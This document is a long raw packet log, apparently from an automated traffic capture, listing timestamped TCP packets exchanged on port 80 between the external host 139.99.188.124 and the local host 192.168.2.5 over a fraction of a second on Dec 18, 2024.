                                                                    Dec 18, 2024 09:13:22.186769962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.186785936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.186840057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.187726021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.187742949 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.187961102 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.188472033 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.188638926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.188709021 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.189340115 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.189508915 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.189683914 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.190331936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.190346956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.190397978 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.190943003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.191132069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.191186905 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.191895962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.192065001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.192416906 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.192779064 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.192951918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.192998886 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.193511009 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.193645000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.193820000 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.195544004 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.195559025 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.195624113 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.196270943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.196286917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.196331978 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.196568966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.196583986 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.196634054 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.197043896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.197200060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.197266102 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.198071957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.198086977 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.198152065 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.198751926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.198932886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.198991060 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.199621916 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.199933052 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.199987888 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.200443029 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.200555086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.200934887 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.201298952 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.201420069 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.201524973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.202178001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.202279091 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.202410936 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.203046083 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.203166008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.203255892 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.203932047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.204051971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.204161882 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.204771996 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.204889059 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.205002069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.205667019 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.205785036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.205862045 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.206518888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.206630945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.206945896 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.207382917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.207483053 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.207581043 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.208241940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.208359957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.208739996 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.209119081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.209227085 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.209336042 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.209995031 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.210095882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.210294008 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.210846901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.210952997 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.211023092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.211720943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.211827040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.212248087 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.212589979 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.212681055 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.212757111 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.213443995 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.213560104 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.213618040 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.214337111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.214437008 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.214585066 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.217444897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217509985 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217530966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217546940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217561960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217577934 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217605114 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.217637062 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.217858076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.217936039 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.218539000 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.219187021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.219350100 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.219492912 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.220114946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.220271111 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.220452070 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.220752001 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.220870018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.221473932 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.221554041 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.221627951 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.221673965 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.222246885 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.277137995 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.368282080 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.368362904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.368654966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.368679047 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.368773937 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.369003057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.369539976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.369642973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.369872093 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.370423079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.370522976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.371262074 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.371371984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.371423960 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.372185946 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.372281075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.372332096 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.373008966 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.373117924 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.373171091 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.373922110 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374030113 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374078989 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.374747038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.374988079 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375603914 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375722885 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.375787973 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.376477957 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.376534939 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.376584053 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.377386093 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.377907038 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.377952099 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.378222942 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.378333092 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.378372908 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.379154921 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.379338026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.379951000 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380001068 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.380055904 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380201101 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.380819082 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.380897045 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381680965 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381805897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.381861925 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.382554054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.382671118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.383464098 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.383527994 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.383553028 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.384295940 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.384345055 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.384396076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.385140896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.385185003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.385310888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386184931 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386229038 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.386286020 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.386565924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.386897087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387006998 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387052059 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.387768030 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387911081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.387959957 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.388605118 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.388725042 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.388771057 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.389482975 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.389607906 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.389651060 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.390348911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.390505075 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.390549898 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.391295910 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.391408920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392086029 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392148972 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.392296076 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.392962933 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393019915 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.393220901 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393810987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.393871069 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.393939018 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.394088984 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.394702911 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.394819021 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395562887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395690918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.395749092 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.396425962 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.396542072 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.396591902 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.397293091 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.397442102 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.397499084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.398149967 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.398266077 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.398313999 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.399009943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399115086 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399885893 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.399935961 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.399991035 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.400765896 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.400813103 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.400855064 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.401624918 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.401675940 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.401720047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.402488947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.402540922 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.402582884 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.402625084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.403345108 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.403481960 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.403539896 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.404249907 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.404356956 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.404414892 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.405076027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.405200005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.405253887 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.405942917 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406070948 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406121016 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.406833887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.406944036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407737970 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407814026 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.407871008 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.408545971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.408670902 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.408721924 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.409429073 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.409540892 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.409590960 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.410310984 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.410422087 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.411151886 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.411221981 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.411258936 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412013054 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412058115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.412178040 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412894964 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.412940025 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.412986994 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.413786888 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.413829088 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.559526920 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559567928 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559881926 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.559945107 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.559961081 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.560327053 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.560762882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.560915947 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561589003 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561745882 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.561800003 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.562474012 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.562597036 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.563329935 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.563381910 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.563510895 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.564214945 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.564263105 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.564336061 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565078974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565123081 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.565181971 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.565745115 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.565933943 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566054106 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566098928 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.566787958 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.566869974 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.567670107 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.567717075 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.567760944 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.568367004 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.568533897 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.568654060 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569403887 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569504976 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.569549084 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.570295095 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.570394993 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.570467949 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.571141005 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.571228027 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.571306944 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.572015047 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572194099 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572248936 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.572871923 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.572988987 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.573035955 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.573829889 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.573961973 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.574140072 CET4972980192.168.2.5139.99.188.124
                                                                    Dec 18, 2024 09:13:22.574618101 CET8049729139.99.188.124192.168.2.5
                                                                    Dec 18, 2024 09:13:22.574682951 CET8049729139.99.188.124192.168.2.5
